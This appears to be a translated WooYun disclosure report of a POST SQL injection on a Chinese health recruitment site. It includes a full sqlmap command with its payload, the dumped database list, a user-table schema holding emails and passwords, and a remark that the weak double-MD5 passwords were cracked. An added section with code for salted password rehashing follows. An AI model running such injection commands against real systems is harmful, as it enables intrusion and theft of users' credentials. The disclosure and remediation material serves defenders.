WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
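2015-08-27: Details sent to the vendor; awaiting vendor handling
2015-08-30: CNCERT (National Internet Emergency Center) has not yet been able to contact the organization concerned; details disclosed only to the notifying body
2015-09-09: Details disclosed to core white hats and experts in related fields
2015-09-19: Details disclosed to regular white hats
2015-09-29: Details disclosed to intern white hats
2015-10-14: Details disclosed to the public
A POST injection found in the wild at one point on the China Health Talent Network (中国卫生人才网)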
Injection command: sqlmap.py -u "http://**.**.**.**/rcjl/outersearchPositionAction.do" --data "radiobutton=radiobutton1&image=88952634&image=%EF%BF%BD%DF%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&select=88952634&select2=88952634&select3=88952634&dwmc=--%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EB%B5%A5%CE%BB%2F%D6%B0%CE%BB%EF%BF%BD%D8%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD--" --dbs
Dumped the database contents
Pulled a little data to prove the impact; there are too many users, so I stopped after running just a small part
available databases [9]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] NEWTES
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] UNIPORTAL
[*] WMSYS

Database: UNIPORTAL
[1 table]
+---------+
| UP_USER |
+---------+

Database: UNIPORTAL
Table: UP_USER
[5 columns]
+--------------------+----------+
| Column             | Type     |
+--------------------+----------+
| UPUS_EMAIL         | VARCHAR2 |
| UPUS_ID            | VARCHAR2 |
| UPUS_NAME          | VARCHAR2 |
| UPUS_PASSWORD      | VARCHAR2 |
| UPUS_REGISTER_TIME | DATE     |
+--------------------+----------+

Database: UNIPORTAL
Table: UP_USER
[111 entries]
+---------------------+
| UPUS_NAME           |
+---------------------+
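The passwords are MD5 passwords encrypted twice, so they have to be decrypted twice to recover them; the first password ultimately turned out to be 888888
In summary
You know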
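For the password-storage finding above, one way to retire unsalted double MD5 without waiting for every user to log in is to wrap each stored hash in a salted, slow KDF. This is an added example, not code from the report or the affected site; the function names, the `pbkdf2-md5md5` record format, the iteration count and the hex encoding between the two MD5 rounds are all assumptions.

```python
import hashlib
import hmac
import os
from typing import Optional

PBKDF2_ITERATIONS = 600_000  # assumed work factor; tune for your hardware
SCHEME = "pbkdf2-md5md5"     # hypothetical label for the wrapped format


def legacy_double_md5(password: str) -> str:
    """Legacy scheme as the report describes it: MD5 applied twice, unsalted.
    Hex-encoding the inner digest is an assumption about the application."""
    inner = hashlib.md5(password.encode("utf-8")).hexdigest()
    return hashlib.md5(inner.encode("ascii")).hexdigest()


def wrap_legacy_hash(legacy_hex: str, salt: Optional[bytes] = None) -> str:
    """Upgrade one stored legacy hash in place; no plaintext needed.
    A per-user random salt makes identical passwords store differently."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", legacy_hex.lower().encode("ascii"),
                             salt, PBKDF2_ITERATIONS)
    return f"{SCHEME}${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify(password: str, stored: str) -> bool:
    """Check a login attempt against a wrapped record."""
    try:
        scheme, iters, salt_hex, dk_hex = stored.split("$")
        salt, iterations = bytes.fromhex(salt_hex), int(iters)
    except ValueError:
        return False  # malformed record
    if scheme != SCHEME:
        return False  # unwrapped or unknown format: reject, do not fall back
    candidate = hashlib.pbkdf2_hmac(
        "sha256", legacy_double_md5(password).encode("ascii"), salt, iterations)
    return hmac.compare_digest(candidate.hex(), dk_hex)


if __name__ == "__main__":
    # Constructed sample: two accounts sharing one password.
    old = legacy_double_md5("constructed-sample-pw")
    a, b = wrap_legacy_hash(old), wrap_legacy_hash(old)
    print(a != b, verify("constructed-sample-pw", a), verify("other", b))
```

Run `wrap_legacy_hash` once over the password column as a migration, then replace the wrapped record with a direct KDF of the plaintext at each user's next successful login.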
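Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2015-08-30 02:22
CNVD confirmed and reproduced the issue described, and has notified the site's operations staff directly.
None yet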